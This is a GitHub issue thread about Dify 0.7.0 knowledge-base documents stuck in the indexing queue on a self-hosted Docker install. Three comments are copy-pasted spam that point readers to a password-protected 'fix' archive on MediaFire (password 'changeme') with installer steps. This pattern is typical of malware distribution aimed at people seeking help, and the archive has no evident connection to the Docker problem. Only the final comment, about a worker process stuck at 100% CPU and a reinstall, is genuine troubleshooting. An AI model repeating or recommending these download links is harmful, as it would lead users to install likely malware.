### ISSUE TITLE
The knowledge base files have been waiting in line since they were uploaded.

### ISSUE THREAD

**Issue by PsycheJ** [langgenius/dify#7745]
### Self Checks

- [X] This is only for bug report, if you would like to ask a question, please head to [Discussions](https://github.com/langgenius/dify/discussions/categories/general).
- [X] I have searched for existing issues [search for existing issues](https://github.com/langgenius/dify/issues), including closed ones.
- [X] I confirm that I am using English to submit this report (我已阅读并同意 [Language Policy](https://github.com/langgenius/dify/issues/1542)).
- [X] [FOR CHINESE USERS] 请务必使用英文提交 Issue，否则会被关闭。谢谢！:）
- [X] Please do not modify this template :) and fill in all the required fields.

### Dify version

0.7.0

### Cloud or Self Hosted

Self Hosted (Docker)

### Steps to reproduce

Before you can use it, recently I do not know what reason has been in the queue, the docker log did not see the error report information, only has been getting the index state.
![QQ图片20240813091305](https://github.com/user-attachments/assets/c75b012c-0e29-4318-90af-317b4a7cae37)

**Comment by Evul88** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by HeinousAgenda38** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by qiliq** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by CracKerMe** [comment]
I encountered the same situation, but after I observed, the worker process in docker is abnormally occupied 100%, so it should be a bug in code execution.

Unfortunately, I ended up deleting the project and re-running it, so if you don't have any important information about your project, deleting the container, removing the cache, and storing irrelevant directories worked for me.
